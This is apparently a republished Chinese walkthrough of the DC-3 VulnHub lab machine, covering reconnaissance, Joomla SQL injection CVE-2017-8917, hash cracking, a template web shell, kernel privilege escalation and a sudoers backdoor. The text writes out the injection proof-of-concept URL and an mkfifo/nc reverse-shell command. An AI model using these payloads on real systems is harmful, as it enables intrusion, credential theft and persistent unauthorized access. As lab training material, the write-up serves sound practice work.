DC-3打靶机步骤
2022-6-7 17:57:9 Author: www.freebuf.com(查看原文) 阅读量:4 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

环境:VMware下:kali Linux(10.9.28.45)、DC-3(10.9.28.196)、win7SP1(10.9.28.131)

范围确定

根据mac地址确定目标

v2-1ad40923920a8a2faf352a1a36d8362b_b.jpg

信息收集

根据http://vulnhun.org的作者描述,此靶机只有1个flag

v2-e4806c80d0f0bf03b734f738a13fa42e_b.jpg

Nmap扫描端口信息,只开放了80端口

v2-2eafefb93aaf72d1eff4e4de94c46e2a_b.jpg

访问目标网页

v2-3482f1f8154966c7f68b36466bba2e03_b.jpg

根据wappalyzer的信息主机使用的CMS是joomla,系统是Ubuntu,后端语言是PHP

v2-2bb9be6f6145ef0a189c3915c78d6887_b.jpg

使用dirsearch扫描目录

v2-5e6ede6520e7b2cc18498b2dfaf2d2a8_b.jpg

6

v2-13f4bc3610869d6f439be312f9edc76e_b.jpg

漏洞挖掘

使用xray

开启浏览器代理

v2-67ac4349e68d34962e73ee2b8f939940_b.jpg

开启xray

v2-137e3fe336dc72d18f0258e63adcdd80_b.jpg

进入网站随便用账密登录,xray扫描到sql注入漏洞,编号为cve-2017-8917

v2-6159bb13102cea669cb034b56f59ac50_b.jpg

根据显示的POC:

http://10.9.28.196/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)

进行验证

v2-accc25d03fa148148ddd94352cb39bb1_b.jpg

漏洞利用

使用sqlmap,先爆数据库,-u指定url,-p指定参数。--dbs显示数据库名 ,期间一路回车

v2-9b7a4a736a71ded7c69cffab532dadd5_b.jpg

Sqlmap还得出时间盲注

v2-7e11e571112aae69b709ffcdec1a1bf0_b.jpg

获取当前数据库名,--current-db显示当前数据库

v2-35fda59ad296bda17677bbd060e4be09_b.jpgv2-212f5384006a72ca0483eb92e99e1f73_b.jpg

获取joomladb下的表,-D 指定数据库,--tables显示表名

v2-29283a728320b8e8863088e5f06c6d50_b.jpg

存在75张表

v2-127db0490b93bbc4df8f898e5b9b3b0b_b.jpg

先查看 #__users 表,-T指定表,--columns显示列名

v2-a738689e334cfb6d5023b709e64d0e5a_b.jpg

此处需要枚举列名

v2-e6bb57aa8e816bdc07a3e0f2434aea4d_b.jpgv2-7d8db0b29a9e03719c22f5a58d659fa5_b.jpg

查看数据,-C指定列,--dump显示数据

v2-7d356404cb8d555f678796880ce2a08c_b.jpg

只有1行admin推测是管理员

v2-91c40eb9bee764c69d120edc12e2e824_b.jpg

把密码拿到存入文件进行本地

v2-3fb80f61de11ce118e8210fe83583d40_b.jpg

使用hashcat尝试破解

v2-9f74330a31ec3a60ed86beae49a9b9d7_b.jpg

得出密码是 snoopy

v2-c7e7aea14194d13340210f4003362e4f_b.jpg

使用这个密码登录网站

v2-5a3b4f979ded8ea48827ef9a019e335a_b.jpg

登录之后啥也干不了

根据信息搜集阶段的目录扫描结果,尝试进入administrator

v2-a47bae232263c883c90177e3d335fc74_b.jpg

选择上方菜单栏,选择templates可以直接编辑网站代码

v2-31e9da56c4034898c2092506788ef918_b.jpg

任意选一个,我这里选error.php,添加一句话木马

v2-a73b78a902c97580086a1a749a2d81cd_b.jpg

进入目标位置验证

v2-1dc441f11463e7af21fdea81ce6afe22_b.jpg

使用蚁剑连接,成功getshell

v2-d810431e3bcfb224d5aebc55dd6e0fdb_b.jpg

反向shell

在kali上使用nc监听端口

v2-6c824776cda7126ce0e0fcea61f9a866_b.jpg

在蚁剑的虚拟终端中查看有没有nc 和-e选项

v2-7f8d7dc27c4c56fde7f9fade76e968b2_b.jpg

没有,就使用

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

v2-4a315fa3d0041b663d79100600219231_b.jpg

在kali中成功连接

v2-ab9b3344fb7a44422b2053bf389a455c_b.jpg

权限提升

查看系统版本

v2-d0e5994b3912bbaa211230b9f490a282_b.jpg

使用searchsploit搜索相关漏洞,使用double-fdput

v2-2d759caef99a81aa5310e812c25f734e_b.jpg

查看漏洞库文件

v2-91bdaf570d5abd923f7f5e077d09bff3_b.jpg

根据使用提示,运行两个文件后直接获取root

v2-efe97b8c185a4d269a4f5c16457f8238_b.jpg

在最后一行得到EXP的下载地址

v2-96a84977efd3635d1a8d9c6b036ef6af_b.jpg

在一般在回收站,日志,缓存目录下有写权限,把EXP传到目标的/tmp目录下

v2-ab054602a57dd3cef608b950fd07391d_b.jpg

解压文件

v2-7171bde8ae92854fc5ef7bce84e45be2_b.jpgv2-9cbb7e1836a2090dbbcfa21836b07c11_b.jpgv2-3c72f859742a58020944034f70a211c0_b.jpg

运行编译文件

v2-dba9ab777d6b716e15a4ff85167e6f74_b.jpg

再运行doubleput,就直接获取root

v2-155824e8fa78e67ab7fcdddc8ac45172_b.jpg

拿到flag

v2-f9628e8533b33fdd86475d6f44b73c3f_b.jpg

维持权限

添加用户,设置密码,然后写入到/etc/sudoers

v2-297bd0b65a9ef40bbbb706a82835156e_b.jpg


文章来源: https://www.freebuf.com/articles/web/334873.html
如有侵权请联系:admin#unsafe.sh